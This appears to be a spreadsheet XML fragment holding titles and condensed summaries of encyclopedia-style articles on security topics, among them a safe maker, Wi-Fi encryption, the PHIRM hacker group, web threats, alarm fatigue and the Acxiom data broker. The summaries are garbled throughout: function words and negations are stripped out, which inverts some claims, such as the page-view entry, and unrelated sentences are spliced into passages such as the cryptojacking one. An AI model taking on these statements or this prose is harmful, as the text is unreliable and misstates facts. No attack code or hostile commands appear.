    <t>brown safe manufacturing inc, family owned security company primarily manufacturers high security custom luxury safes vaults, operating vista, california. history founded 1980 fredrick brown, brown safe manufacturing inc. created intention manufacture world’s secure safes.inspired engineering projects father grandfather, fredrick brown pursue work area mechanical design. brown graduated 1976 bachelor science degree engineering diego state university. soon fredrick brown’s mechanical understanding fascination complex devices world safe design. demand brown safes remained fairly level throughout 90’s numerous local manufacturers competition strong. soon influx highly affordable less well built safes imported primarily china rapidly american safe builders business. safe builders survived primarily employing strategy nearly took down. they built grade safes could compete directly imports based manufacturing costs. many builders abandoned role manufacturers became resellers imported safes. safe sales dwindled family business struggled years, relying primarily military contracts dedicated employee base weather turbulent times. start 21st century rise internet brought tremendous opportunity renewed growth brown safe. provided perfect means market high safes much larger market. with help internet savvy daughter highly technical minded son, brown safe launched first website early 2000. today, brown safe’s facilities occupy 85,000 square feet (7,900 m2), employing workforce sixty along contracting numerous external agencies. demand brown safes continues steady pace. references company christine davis world home safes, quality counts”, north county times, september 2007, available merrick “bank branches close down, vaults safe”, wall street journal, february 2001 mike freeman “bank-vault work safe bet”, diego union tribune, february 2001 “leading safe manufacturer issues distressing crime wave warning”, reuters archived 2013-02-01 archive.today safe buying guide external links official website</t>
  </si>
  <si>
    <t>Access Space</t>
  </si>
  <si>
    <t>access space open digital arts sheffield united kingdom. longest running free media practising promoting sustainability re-use technology. funded arts council england, european social fund european union, national lottery about access space showcased redundant technology initiative, using hardware free rejuvenating free/open source software. works also included zero dollar laptop project, redundant technology made useful, used workshops homeless vulnerable people, keep laptops installed. access space model open project, "grow your media lab" initiative inspired centres across europe brazil. their work also extends beyond digital, supporting explorations technology traditional craft. recognition significance access space's work education skill development recognised academic research models emerging economies. access space also recognised britain's "new radicals" report co-sponsored observer newspaper national endowment science, technology arts (nesta). closure premises 2020 official access space website stated access space currently venues. references external links access space website grow your media</t>
  </si>
  <si>
    <t>Opportunistic Wireless Encryption</t>
  </si>
  <si>
    <t>opportunistic wireless encryption (owe) wi-fi standard ensures communication pair endpoints protected endpoints. unlike conventional wi-fi, provides "individualized data protection" data traffic client access point "individualized". other clients still sniff record traffic, can't decrypt extension ieee 802.11. encryption technique similar simultaneous authentication equals (sae) specified internet engineering task force (ietf) 8110 devices certified wi-fi certified enhanced open wi-fi alliance. also wi-fi protected access references further reading "file download wi-fi alliance". www.wi-fi.org.</t>
  </si>
  <si>
    <t>Budapest Declaration on Machine Readable Travel Documents</t>
  </si>
  <si>
    <t>budapest declaration machine readable travel documents declaration issued future identity information society (fidis), network excellence, raise concern public risks associated security architecture related management machine readable travel documents (mrtds), current implementation passports european union creates threats related identity theft, privacy. declaration proclaimed budapest september 2006. references</t>
  </si>
  <si>
    <t>P.H.I.R.M.</t>
  </si>
  <si>
    <t>phirm early hacking group founded early 1980s. first going name "kilobaud", firm reorganized 1985 reflect airwolf, favorite television show time. mid-1980s phirm sysopping hundreds boards. some notable boards included thieves' underground sysoped jack ripper, angel's nest sysoped archangel, world's grave elite sysoped gamelord, satcom phirm broke 1990, voluntarily, stating legion doom arrests become high-profile. 1985 phrack magazine article brought group public eye, began take members. 1987 founders, archangel stingray, co-authored report cleveland's free-net. 1989 group published definitive guide breaking security bank america home banking systems. this brought great deal scrutiny group arrests. time break-up phirm, however, still members. phirm last "old school" (1980s) hacker groups disband. most membership disappeared. others went start groups. founding members archangel blade runner jack ripper systematic stingray gamelord dino chris wilson night crawler later members dino dark creaper baron harkonnen jimmy jacker electel king blotto da_k3yb0ard_c0w_b0y (later anonymouspef) references external links sample textfile, "breaking bank america's security" phrack magazine article, issue influential hacker groups 2600 magazine, contributors</t>
  </si>
  <si>
    <t>Pakistan Automated Fingerprint Identification System</t>
  </si>
  <si>
    <t>pakistan automated fingerprint identification system (pafis) lounched prime minister mohammad mian soomro along u.s. deputy chief mission peter bodde january 2008. purpose pakistan automated fingerprint identification system (pafis) aims computerize critical information criminals criminal activities share enforcement agency. also used facilitate analysis criminal data. references</t>
  </si>
  <si>
    <t>Brave Search</t>
  </si>
  <si>
    <t>brave search search engine developed brave software, inc. default search engine brave browser users certain countries. history brave search search engine developed brave software, inc. released beta march 2021, following acquisition tailcat, privacy-focused search engine cliqz. brave search aims independent index generate search results. however, user allow brave browser anonymously check google query.brave search claims eventually offer ad-supported free search well ad-free paid search options. hopes explore bringing revenue sharing similar fashion brave platform.in october 2021, brave search made default search engine brave browser users united states, canada, united kingdom (replacing google search), france (replacing qwant) germany (replacing duckduckgo ecosia).in june 2022, brave search ended beta stage fully released. addition launch, goggles feature added allowing users apply rules filters search queries. features brave search various features designed enhance users searching experience: brave indexing: brave search unique indexing, rely third-parties google bing's indexing. brave search premium: users optionally create account brave search premium support brave search directly providing independent unbias search results. brave search currently ad-free website, eventually switch model include premium users ad-free experience. opt-in data collection: user data including addresses collected users default. premium account required opt-in data-collection. discussions: feature shows conversations related search query, comments website reddit. when user searches scrolls down, available discussions section contain various forums user click answer user online community. goggles: feature allows users apply rules filters search. data collection brave search implement level data-collection, users opt-in. this done discovery project. project methodology system developed brave software, inc. collect data generated users protecting privacy anonymity. users opt-in time using search engine modifying settings, account required function. references external links brave search</t>
  </si>
  <si>
    <t>XUDA</t>
  </si>
  <si>
    <t>xuda (xcert universal database api) library used integrated many public infrastructure (pki) products different vendors like keon labs. xuda application programming interface (api) enables programmers develop applications. xuda best seen toolkit library programs isolates applications complexities pki. encapsulates secure database access strong authentication public certificates, employs ssl–ldap query remote databases using certificates presented transaction. xuda built cryptography vendors. this allows vendors provide customers cryptography choice, including pkcs#11 compliant smart cards hardware tokens. xcert privately held company developed delivered digital certificate-based products securing e-business transactions. february 2001 company acquired labs. external links ldap survey: xcert software inc. wayback machine (archived 2005-01-14) references</t>
  </si>
  <si>
    <t>Botlab</t>
  </si>
  <si>
    <t>botlab (previously known botlab.io) non-profit, volunteer based research foundation focused research, publication open-source development related fraud, malvertising, privacy violations malicious practices advertising supported internet. botlab's global volunteer network works towards goal transparent secure internet. media coverage paper authored botlab, compendium fraud knowledge widely covered media including financial times cover story. paper collaboration world federation advertisers, whose members collectively represent world's us$700 advertising budgets. published paper official guideline document members understanding countering fraud.botlab researchers featured additional financial times cover stories 2015 2016 read major editorial piece week financial times print. addition botlab's work commentary widely featured industry press, events social media research during 2016 botlab's fraud council author world federation advertisers guidance fraud members titled compendium fraud knowledge. botlab also contributed co-author independent auditing online display advertising campaigns, research paper accepted hotnets academic conference 2016 major contributor entropy method detecting invalid traffic scale, paper introducing open source method large scale detection invalid traffic. open source contributions during 2015 2016 botlab made available three open source solutions focused detection prevention advertising fraud: denylist blacklist consisting million data center addresses sitemind site research tool researchers media planners counter fraud nameles entropy based detection filtering solution counter fraud collaboration trade associations addition listed partners world federation advertisers, since botlab's founding early 2015 principal mikko kotila acted co-chair i-com's data science board, i-com global trade body backed associations countries, today, exploring creation business value marketing data measurement. references</t>
  </si>
  <si>
    <t>Out of the Inner Circle</t>
  </si>
  <si>
    <t>inner circle: hacker's guide computer security book bill landreth howard rheingold, published 1985 microsoft press distributed simon schuster (isbn 0-671-30942-0). book created provide insight ways methods hacking community days internet became prevalent. although largely outdated nostalgic, show brought many current trends network security today. references</t>
  </si>
  <si>
    <t>Albert One</t>
  </si>
  <si>
    <t>albert chatterbot created robby garner designed mimic humans make conversations using multi-faceted approach natural language programming. history 1998 1999, albert loebner prize contest, competition chatterbots.some parts albert deployed internet beginning 1995, gather information kinds things people would chatterbot. another element albert involved building large database human statements, associated replies. this portion project tested 1994-1997 loebner prize contests. albert first robby garner's multifaceted bots. albert system composed several subsystems. among version eliza, therapist, elivs, another eliza-like bot, several helper applications working together hierarchical arrangement. continuation stimulus-response library, various database queries assertions tested arrive albert's responses. robby went develop networked examples kind hierarchical "glue" turing hub. references external links loebner prize contest home page</t>
  </si>
  <si>
    <t>Project Shield</t>
  </si>
  <si>
    <t>project shield anti-distributed-denial-of-service (anti-ddos) service offered jigsaw, subsidiary google, websites "media, elections, human rights related content." main goal project serve "small, under-resourced news sites vulnerable web's growing epidemic ddos attacks", according team lead george conard.google initially announced project shield ideas conference october 2013. service initially offered trusted testers, february 2016, google opened service qualifying website google-owned reverse proxy identifies filters malicious traffic. 2018, jigsaw announced would start offering free protection distributed denial service attacks political campaigns, candidates, political action committees. references external links official website</t>
  </si>
  <si>
    <t>Web threat</t>
  </si>
  <si>
    <t>threat threat uses world wide facilitate cybercrime. threats multiple types malware fraud, utilize http https protocols, also employ protocols components, links email malware attachments servers access web. they benefit cybercriminals stealing information subsequent sale help absorb infected botnets. threats pose broad range risks, including financial damages, identity theft, loss confidential information/data, theft network resources, damaged brand/personal reputation, erosion consumer confidence e-commerce online banking. type threat related information technology (it). risk, i.e. risk affecting gained increasing impact society spread processes. reaching path threats divided primary categories, based delivery method push pull. push-based threats spam, phishing, fraudulent means lure user malicious (often spoofed) website collects information and/or injects malware. push attacks phishing, poisoning pharming), means appear originate trusted source. precisely-targeted push-based threats often referred spear phishing reflect focus data gathering attack. spear phishing typically targets specific individuals groups financial gain. push-based threats, malware authors social engineering enticing subject lines reference holidays, popular personalities, sports, pornography, world events topics persuade recipients open email follow links malicious websites open attachments malware accesses web. pull-based threats often referred “drive-by” threats experts (and commonly “drive-by downloads” journalists general public), since affect website visitor. cybercriminals infect legitimate websites, unknowingly transmit malware visitors alter search results take users malicious websites. upon loading page, user's browser passively runs malware downloader hidden html frame (iframe) without user interaction. growth threats giorgio maone wrote 2008 today’s malware runs mostly runs windows it’s commonest executable platform, tomorrow’s likely web, reason. because, like not, already huge executable platform, start thinking way, security perspective."the growth threats result popularity relatively unprotected, widely consistently used medium crucial business productivity, online banking, e-commerce well everyday lives people worldwide. appeal applications websites increases vulnerability web. most applications make ajax, group development programming tools used creating interactive applications rich internet applications. while users benefit greater interactivity dynamic websites, also exposed greater security risks inherent browser client processing. examples september 2008, malicious hackers broke several sections businessweek.com redirect visitors malware-hosting websites. hundreds pages compromised malicious javascript pointing third-party servers.in august 2008, popular social networking sites worm using social engineering techniques users install piece malware. worm installs comments sites links fake site. users follow link, told need update flash player. installer installs malware rather flash player. malware downloads rogue anti-spyware application, antispy spider. humanitarian, government news sites israel asia. attack compromised websites led, variety redirects, download trojan. september 2017, visitors network showtime's website found website included coinhive code automatically began mining monero cryptocurrency without user consent. adoption online services brought changes online services operations following advancement mobile communication techniques collaboration service providers result, online service technology become conductive individuals. recent mobile technological wonders coinhive software throttled twenty percent visiting computer's avoid detection. shortly discovery publicized social media, coinhive code removed. showtime declined comment multiple news articles. it's unknown showtime inserted code website intentionally addition cryptomining code result website compromise. coinhive offers code websites requires user consent prior execution, less percent coinhive implementations code. german researchers defined cryptojacking websites executing cryptomining visiting users' computers without prior consent. with every five hundred websites hosting cryptomining script, cryptojacking persistent threat. prevention detection conventional approaches failed fully protect consumers businesses threats. viable approach implement multi-layered protection—protection cloud, internet gateway, across network servers client. also asset (computing) attack (computing) botnets browser security countermeasure (computer) cybercrime cyberwarfare denial-of-service attack high orbit cannon risk internet safety internet security orbit cannon man-in-the-browser rich internet applications threat (computer) vulnerability (computing) applications developmentweb threat solution references</t>
  </si>
  <si>
    <t>BotHunter</t>
  </si>
  <si>
    <t>bothunter free utility unix, aims detecting botnet activity within network. analyzing network traffic comparing patterns characteristic malicious processes. version 1.7.2 current march 2013. earlier version microsoft windows mentioned site release 1.7.2. order support application, developer, international, collected 10,000 samples malware 2008.the bothunter site states software made possible part research grant u.s. army research office. references external links bothunter website</t>
  </si>
  <si>
    <t>Pageview</t>
  </si>
  <si>
    <t>analytics website management, pageview page view, abbreviated business occasionally called page impression, request load single html file (web page) internet site. world wide web, page request would result surfer clicking link another page pointing page question. contrast, refers request file server. therefore, many hits page view since html page contain multiple files images, videos, javascripts, cascading style sheets (css), etc. balance, page views refer number pages viewed clicked site given time.page views counted part analytics. owner site, information useful change "page" (such information presented) results visits. advertisements page, publishers would also interested number page views determine expected revenue ads. reason, term used widely internet marketing advertising. feature page impression long measure user activity website. however, activity necessarily associated loading complete html page. modern programming techniques serve pages means show http requests. advertisement since page views help estimate popularity sites, helps determine value advertising revenue. common metric cpm. stands 'cost thousand'(the roman numeral 1,000) commonly used metrics measure page views divided thousands, cost 1000 views, used rates thus, less better deal offers advertisers. however, growing concern trustworthy looks advertising market because, although, arrangement, everyone visits site makes publishers’ money, advertiser's view, challenged comparison terms adverts’ efficiency visiting mean clicking ads. measurement preferred count page views using analytics software. they measure number pages site therefore, helps people receive rough estimate page views sites. there also many page view measurement tools available including open source ones well licensed products. ratio ratio refers percentage computer memory accesses (https requests delivered requests received) found certain levels memory hierarchy. words, measure content requests caching system deliver successfully cache storage, compared many requests receives. there types ratios: cache ratio, referring number requests made; byte ratio, referring amount bandwidth browser's caching system saved. criticism concerns despite wide range uses page view, come criticisms. manipulation page view manipulated boosted specific purposes. example, recent incident, called 'page view fraud', compromised accuracy measurement page view boosting page view. perpetrators used tool called bot' fake page-views attention, recognition, feedback, increasing site's value. result, people already started building alternatives measure audiences, "ophan", saying page view becoming passe. humans machines fake page views reflect bots instead humans. wikipedia pageviews wikipedia provides tools allow many people visited wikipedia article given time period. such used tools instance display popular articles day. wikipedia pageviews certain types articles correlate changes stock market prices, office success movies, spread disease among applications datamining. since search engines directly influence popular wikipedia statistics provide unfiltered real-time view people searching societal interests. instance used gain insights public anxiety information seeking events identification concepts significant increase interest public. 2015, study conducted association advancement artificial intelligence (aaai) examined influence reddit posts wikipedia pageviews. also project counter unique user session (web analytics) traffic flow http cookie traffic website monitoring google trends internet manipulation click references further reading greenberg, julia 2015). "page views don't matter anymore—but they just won't die". wired. retrieved 2016.</t>
  </si>
  <si>
    <t>Alarm fatigue</t>
  </si>
  <si>
    <t>alarm fatigue alert fatigue describes busy workers case health care, clinicians) become desensitized safety alerts, result ignore fail respond appropriately warnings. alarm fatigue occurs many fields, including construction mining (where backup alarms sound frequently often become senseless background noise), healthcare (where electronic monitors tracking clinical information vital signs blood glucose sound alarms frequently, often minor reasons, lose urgency attention-grabbing power intended have), nuclear power field. like crying wolf, false alarms critical alarms importance deserve. alarm management policy critical prevent alarm fatigue. healthcare constant sounds alarms noises blood pressure machines, ventilators heart monitors causes "tuning out" sounds brain adjusting stimulation. this issue present hospitals, home care providers, nursing homes medical facilities alike. food drug administration cataloged deaths ignored alarms period 2005-2008. united states-based joint commission's sentinel event reports alarm-related deaths alarm-related serious injuries course years. april 2013, joint commission issued sentinel event alert highlighted widespread problem alarm fatigue hospitals. their recommendations included establishing guidelines tailor alarm settings, training members clinical team safe alarms, sharing information alarm-related incidents. this alert resulted designation 2014 clinical alarm system safety national patient safety goal remains goal 2017. this goal force hospitals establish alarm safety priority, identify important alarms, establish policies manage alarms january 2016. ecri institute listed alarms "top hazards list" since 2007; 2014, alarms listed number hazard. unintended outcomes alarms large number alarms, especially false alarms, several unintended outcomes. some consequences disruption patient care, desensitization alarms, anxiety hospital staff patients, sleep deprivation depressed immune systems, misuse monitor equipment including "work-arounds" turning alarm volumes adjusting device settings, missed critical events. some additional outcomes include workload increase, interference communication, wasted time, patient dissatisfaction, unnecessary investigations, referrals, treatments. solutions there many solutions proposed reduce alarm fatigue healthcare settings: change alarm sounds softer friendlier order improve identification alarms sound alone. another recommendation clinicians adjust parameters delays alarms match patient's traits status. however, directly trades sensitivity specificity. centralized alarms. approach, alarms fire bedside, fire central monitoring station trained healthcare provider evaluates alarm alerts bedside clinician intervene evaluate patient. adjust alarm algorithms. currently, alarm systems sensitive specific. this leads large amount false alarms. algorithms used adjusted balance sensitivity specificity limit number false alarms still detect true deterioration. child abduction amber alert system used countries united states canada notify public child abduction theorized susceptible alarm fatigue. 2018 abduction thunder resulted amber alert sent cell phones away ottawa, hours' drive thunder bay, followed hour later second alert notified individuals first alert resolved. similar double alert occurred single night february 2019, leading concerns alert fatigue. public transport york city subway, metropolitan transportation authority installed sirens 2006 discourage subway users using emergency exits evade fares; sirens little effect irritating passengers removed 2015.alarm fatigue sometimes contributed public transport disasters 2009 train collision washington, caused faulty track circuit failed detect presence stopped train. though automatic train control system generated alerts notifying train dispatchers presence faulty circuits, rate alerts 8,000 week. investigation national transportation safety board concluded "the extremely high incidence track-circuit alarms would thoroughly desensitized [the dispatchers]". weather some people think large number deaths hurricane york jersey result many warnings. since 2012, weather alerts sent cell phones, 2020, federal officials three-tier system people would warning serious situations. also alarm management compassion fatigue normalization deviance semantic satiation references</t>
  </si>
  <si>
    <t>Acxiom</t>
  </si>
  <si>
    <t>acxiom (pronounced "ax-ee-um") conway, arkansas-based database marketing company. company collects, analyzes sells customer business information used targeted advertising campaigns. company formed 2018 acxiom corporation (since renamed liveramp) spun acxiom marketing services (ams) division global advertising network interpublic group companies.the company offices united states, europe asia. history business became acxiom founded 1969 demographics, inc. charles ward conway, arkansas. 1988 became acxiom corporation, 2012, york times reported company world’s largest commercial database consumers.on 2014, acxiom corporation announced acquired liveramp, data onboarding company, $310 million.in january 2017, acxiom corporation launched audience cloud, anonymous targeting tool allowed demographic segmentation customers without revealing actual identities.in february 2018, acxiom corporation announced reorganization divisions acxiom marketing solutions (ams) liveramp. july, advertising company interpublic group companies (ipg) announced buying acxiom corporation's business $usd2.3 billion. september, acxiom corporation officially changed name liveramp, allowing business owned keep acxiom name. also september, company introduced open data framework allowing clients combine online offline data sources.in december 2019, acxiom integrated data data exchange. business acxiom provides anonymized customer data marketers, allowing delivery relevant consumers, effective measurement.acxiom's client base united states consists primarily companies financial, insurance investment services, automotive, retail, telecommunications, healthcare, travel, entertainment, non-profit government sectors. products audience cloud identifies anonymous audience segments, matches publications display targeted member audience visits particular site. global data navigator service allows agencies select global data elements country. infobase company's brokered warehouse consumer data. personicx customer segmentation tool. unified data layer (udl) uses cloud architecture help firms connect online offline data, better identify consumers' identities, goal complying gdpr privacy laws. locations acxiom's headquarters located conway, arkansas, united states. company additional u.s. offices austin, texas, downer's grove, illinois york, york. international offices located united kingdom, germany, poland, china. references external links official website</t>
  </si>
  <si>
    <t>Aladdin Knowledge Systems</t>
  </si>
  <si>
    <t>aladdin knowledge systems (formerly nasdaq: aldn tase: aldn) company produced software digital rights management internet security. company acquired safenet inc, 2009. corporate headquarters located belcamp, history aladdin knowledge systems founded 1985 jacob (yanki) margalit, years old; soon joined brother dany margalit, took responsibility product development time completing mathematics computer science degree aviv university. early years company developed product lines, artificial intelligence package (which dropped early hardware product prevent unauthorized software copying, similar digital rights management. margalit raised $10,000 initial capital company.the digital rights management product became success 1993 generated sales $4,000,000. year company initial public offering nasdaq raising $7,900,000. 2004 company's shares also listed aviv stock exchange. 2007 company's annual revenues reached $105 million. mid-2008, vector capital attempting purchase aladdin. vector initially offered $14.50 share, aladdin's founder margalit refused offer arguing company worth more. aladdin's shareholders agreed merger february 2009 $11.50 share, cash. march 2009, vector capital acquired aladdin officially merged safenet. corporate timeline 1985 aladdin knowledge systems established 1993 aladdin held initial public offering 1996 aladdin acquired german company fast 1998 aladdin patented smart card-based authentication tokens 1998_dec aladdin acquired software protection business eliashim 1999 aladdin acquired esafe "content security" business eliashim 2000 aladdin acquired comsec 2001 aladdin acquired assets preview systems 2005 aladdin completed second offering 2,000,000 shares proceeds $39m 2009 aladdin acquired vector capital. 2010 aladdin merged vector capital's safenet. products aladdin's hasp product line digital rights management (drm) suite protection licensing software global market share, used 30,000 software publishers. used across many platforms (windows, linux, mac).hasp, stands hardware against software piracy, company's first product evolved complete digital rights management suite, includes software option back office management application, recent years also software service capability. internet security late 1990s company started diversifying began offering internet security network security products, offering product lines: digital identity management etoken, portable device two-factor authentication, pasdigital identity management, mainly deployed token. network security esafe line integrated network security content filtering products, protecting networks cracked pirated internet-borne software. also product activation license manager list license managers floating licensing silicon wadi references external links safenet inc. data protection software licensing website content security esafe etoken pass aladdin product aladdin knowledge systems website</t>
  </si>
  <si>
    <t>Ad-Aware</t>
  </si>
  <si>
    <t>Outline of computer security</t>
  </si>
  <si>
    <t>following outline provided overview topical guide computer security: computer security commonly known security applied computing devices computers smartphones, well computer networks private public networks, including whole internet. field covers processes mechanisms digital equipment, information services protected unintended unauthorized access, change destruction, growing importance line increasing reliance computer systems societies worldwide. computer security includes measures taken ensure integrity files stored computer server well measures taken prevent unauthorized access stored data, securing physical perimeter computer equipment, authentication users computer accounts accessing data, providing secure method data transmission. essence computer security computer security described following: branch security network security application security areas computer security access control selective restriction access place resource. accessing mean consuming, entering, using. permission access resource called authorization.computer access control includes authorization, authentication, access approval, audit.authentication knowledge-based authenticationintegrated windows authenticationpasswordpassword length parameter secure password authenticationsecure shell kerberos (protocol) spnego ntlmssp aegis secureconnect tacacscyber security countermeasure device fingerprint physical security protecting property people damage harm (such theft, espionage, terrorist attacks). includes security measures designed deny unauthorized access facilities, (such computer room), equipment (such computer), resources (like data storage devices, data, computer). computer gets stolen, data goes addition theft, physical access computer allows ongoing espionage, like installment hardware keylogger device, data security protecting data, database, destructive forces unwanted actions unauthorized users. information privacy relationship collection dissemination data, technology, public expectation privacy, legal political issues surrounding them. privacy concerns exist wherever personally identifiable information sensitive information collected stored digital form otherwise. improper non-existent disclosure control root cause privacy issues. internet privacy involves right mandate personal privacy concerning storing, repurposing, provision third parties, displaying information pertaining oneself internet. privacy entail either personally identifying information (pii) non-pii information site visitor's behavior website. refers information used identify individual. example, physical address alone could identify individual without explicitly disclosing name, factors relate specific person. mobile security security pertaining smartphones, especially respect personal business information stored them. network security provisions policies adopted network administrator prevent monitor unauthorized access, misuse, modification, denial computer network network-accessible resources. network security involves authorization access data network, controlled network administrator. network security toolkit internet security computer security specifically related internet, often involving browser security also network security general level applies applications operating systems whole. objective establish rules measures attacks internet. internet represents insecure channel exchanging information leading high risk intrusion fraud, phishing. different methods used protect transfer data, including encryption. world wide security dealing vulnerabilities users visit websites. cybercrime include identity theft, fraud, espionage intelligence gathering. criminals, become preferred spread malware. computer security threats variety threats combined rapid development threats made cyber insecurity removal information assurance 'status quo'. long continues computer, also takes interest manipulating, modifying, creating bypassing 'rules' 'security standards.' common effective method violating computer security protocols phishing; phishing process providing cloned login page site victim uses, example, google's gmail user enters his/her login information, data captured access victims account gained. many corporations executive's, mid-ranking managers even level staff many current u.s. corporations idea malicious user quietly passively intercepting communications. why? strong motivation theft intellectual property. often victims phishing either never become aware privacy breached, many months pass become aware privacy lost.methods computer network attack computer network exploitation social engineering frequent method attack, take form phishing, spear phishing corporate government world, well counterfeit websites. password sharing insecure password practices poor patch management computer crime computer criminals hackers context computer security, hacker someone seeks exploits weaknesses computer system computer network. password cracking software cracking script kiddies list computer criminals identity theft computer malfunction operating system failure vulnerabilities hard disk drive failure occurs hard disk drive malfunctions stored information cannot accessed properly configured computer. disk failure occur course normal operation, external factor exposure fire water high magnetic fields, suffering sharp impact environmental contamination, lead head crash. data recovery failed hard disk problematic expensive. backups essential computer network surveillance middle loss anonymity one's identity becomes known. identification people computers allows activity tracked. example, person's name matched address using, activity tracked thereafter monitoring address. http cookie local shared object spyware adware cyber spying obtaining secrets without permission holder information (personal, sensitive, proprietary classified nature), individuals, competitors, rivals, groups, governments enemies personal, economic, political military advantage using methods internet, networks individual computers cracking techniques malicious software including trojan horses spyware. done online professionals sitting computer desks bases away countries, involve infiltration home computer trained conventional spies moles, criminal handiwork amateur malicious hackers, software programmers, thieves. computer network eavesdropping lawful interception driving packet analyzer (aka packet sniffer) mainly used security tool many ways, including detection network intrusion attempts), packet analyzers also used spying, collect sensitive information (e.g., login details, cookies, personal communications) sent network, reverse engineer proprietary protocols used network. protect data sent network internet using encryption software. cyberwarfare exploit piece software, chunk data, sequence commands takes advantage bug, glitch vulnerability order cause unintended unanticipated behavior occur computer software, hardware, something electronic (usually computerized). such behavior frequently includes things like gaining control computer system, allowing privilege escalation, denial-of-service attack. trojan computer virus computer worm denial-of-service attack attempt make machine network resource unavailable intended users, usually consisting efforts temporarily indefinitely interrupt suspend services host connected internet. common method attack involves saturating target machine external communications requests, much cannot respond legitimate traffic, responds slowly rendered essentially unavailable. distributed denial-of-service attack (ddos) attack sent persons. hacking tool malware[hid spoofing keylogger] computer virus computer worm keylogger program keystroke logging, action recording logging) keys struck keyboard, typically covert manner person using keyboard unaware actions monitored. rootkit stealthy type software, typically malicious, designed hide existence certain processes programs normal methods detection enable continued privileged access computer. term rootkit concatenation "root" (the traditional name privileged account unix operating systems) word "kit" (which refers software components implement tool). spyware trojan data loss file deletion data loss prevention software natural disasters fire, flood, etc. cause loss computers data. either fire water cause hard disk drive failure, example. earthquakes cause data center down. reason large businesses load balancing failover techniques ensure business continuity. payload malicious code delivered vulnerable computer, often masquerading something else physical loss losing computer (for example fire, leaving one's laptop bus), results data loss, unless backup. physical theft someone takes property without authorization own. when computer stolen, data gone too, unless backup. laptop theft stealing laptop computer. victims laptop theft lose hardware, software, essential data backed thieves also access sensitive data personal information. some systems authorize access based credentials stored laptop including addresses, cookies, cryptographic keys stored passwords. vulnerabilities exploitable vulnerability vulnerability exploit exists open port port number configured accept packets. ports integral part internet's communication model channel applications client computer reach software server. services, pages ftp, require respective ports "open" server order publicly reachable. "open" (reachable) enough communication channel established. there needs application (service) listening port, accepting incoming packets processing them. open ports vulnerable service listening firewall filtering incoming packets them. security zero-day attack hackers computer defenses security measures access control systems authentication multi-factor authentication authorization firewalls internet security firewall firewall pinhole hole punching hole punching hole punching icmp hole punching next-generation firewall virtual firewall stateful firewall context-based access control dual-homed ipfilter zone alarm linux firewall capabilities debian vyatta vyos router project freebsd m0n0wall ipfirewall opnsense pfsense intrusion detection system intrusion prevention system mobile secure gateway access control access control selective restriction access place resource. accessing mean consuming, entering, using. permission access resource called authorization. computer access control includes authorization, authentication, access approval, audit. authorization function specifying access rights computer resources. authorize" define access policy. example, human resources staff normally authorized access employee records policy formalized access control rules computer system. during operation, computer system uses access control rules decide whether access requests (authenticated) consumers shall approved (granted) disapproved (rejected). resources include individual files item's data, computer programs, computer devices functionality provided computer applications. examples consumers computer users, computer programs devices attempting access data computer. authentication confirming identity consumer. context, consumer computer user, computer program, device attempting access data computer user account system unique user. allows user authenticate (log system granted authorization access resources provided connected system; however, authentication imply authorization. account, user typically required authenticate oneself password credentials purposes accounting, security, logging, resource management. password word string characters used user authentication prove identity access approval gain access resource (example: access code type password), kept secret allowed access. access approval (computer access control) audit physical security protecting property people damage harm (such theft, espionage, terrorist attacks). includes security measures designed deny unauthorized access facilities, (such computer room), equipment (such computer), resources (like data storage devices, data, computer). computer gets stolen, data goes addition theft, physical access computer allows ongoing espionage, like installment hardware keylogger device, examples physical security system components include: locks locks used secure building room computer they also used computer casings prevent opening computers remove swap parts, install unauthorized components. used computer disallow turned used without physical key. there also locks attach cables laptops prevent taken. computer lock security alarms security barriers fences walls. security guards theft recovery software lojack cars, theft recovery software desktop laptop computers. application security application security antivirus software secure coding security design secure operating systems data security data security protecting data, database, destructive forces unwanted actions unauthorized users. information privacy information privacy relationship collection dissemination data, technology, public expectation privacy, legal political issues surrounding them. privacy concerns exist wherever personally identifiable information sensitive information collected stored digital form otherwise. improper non-existent disclosure control root cause privacy issues. internet privacy involves right mandate personal privacy concerning storing, repurposing, provision third parties, displaying information pertaining oneself internet. privacy entail either personally identifying information (pii) non-pii information site visitor's behavior website. refers information used identify individual. example, physical address alone could identify individual without explicitly disclosing name, factors relate specific person. mobile security mobile security security pertaining smartphones, especially respect personal business information stored them. network security network security provisions policies adopted network administrator prevent monitor unauthorized access, misuse, modification, denial computer network network-accessible resources. network security involves authorization access data network, controlled network administrator. internet security computer security specifically related internet, often involving browser security also network security general level applies applications operating systems whole. objective establish rules measures attacks internet. internet represents insecure channel exchanging information leading high risk intrusion fraud, phishing. different methods used protect transfer data, including encryption. virtual private network (vpn) extends private network across public network, internet. enables computer network-enabled device send receive data across shared public networks directly connected private network, benefiting functionality, security management policies private network. created establishing virtual point-to-point connection dedicated connections, virtual tunneling protocols, traffic encryptions. ipsec protocol suite securing internet protocol (ip) communications authenticating encrypting packet communication session. ipsec includes protocols establishing mutual authentication agents beginning session negotiation cryptographic keys used session. ipsec used protecting data flows pair hosts (host-to-host), pair security gateways (network-to-network), security gateway host (network-to-host). openvpn open-source software application implements virtual private network (vpn) techniques creating secure point-to-point site-to-site connections routed bridged configurations remote access facilities. uses custom security protocol utilizes ssl/tls exchange. capable traversing network address translators (nats) firewalls. written james yonan published general public license (gpl). world wide security world wide security dealing vulnerabilities users visit websites. cybercrime include identity theft, fraud, espionage intelligence gathering. criminals, become preferred spread malware. history computer security timeline computer security hacker history computer security industry computer security software antivirus software list antivirus software (and comparison) encryption software list cryptographic file systems pretty good privacy firewall list firewalls (and comparison) list router firewall distributions testing labs av-test –independent organization evaluates rates antivirus security suite software microsoft windows android operating systems, according variety criteria. every month, researchers publish results testing, list products awarded certification. organisation based magdeburg, germany. icsa labs independent division verizon business tests certifies computer security software (including anti-spyware, anti-virus, firewall products), fee. virus bulletin magazine conducts tests anti-virus software. magazine prevention, detection removal malware spam. regularly features analyses latest virus threats, articles exploring developments fight viruses, interviews anti-virus experts, evaluations current anti-malware products. west coast labs tests computer security products fee. checkmark certification program reports test results public. computer security companies mcafee, inc. (intel security) american global computer security software company headquartered santa clara, california, world's largest dedicated security technology company. february 2011, mcafee became wholly owned subsidiary intel. early 2014, intel announced would rebrand mcafee intel security 2014. secunia american computer security company software offerings vulnerability management, security patch management. computer security publications journals magazines 2600: hacker quarterly technical political articles interest internet security community virus bulletin magazine prevention, detection removal malware spam. regularly features analyses latest virus threats, articles exploring developments fight viruses, interviews anti-virus experts, evaluations current anti-malware products. books computer security deception intrusion crypto: code rebels beat government—saving privacy digital cuckoo's egg: tracking through maze computer espionage 1989 book written clifford stoll. first person account hunt hacker broke computer lawrence berkeley national laboratory. cypherpunks firewalls internet security hacker crackdown hacker's handbook 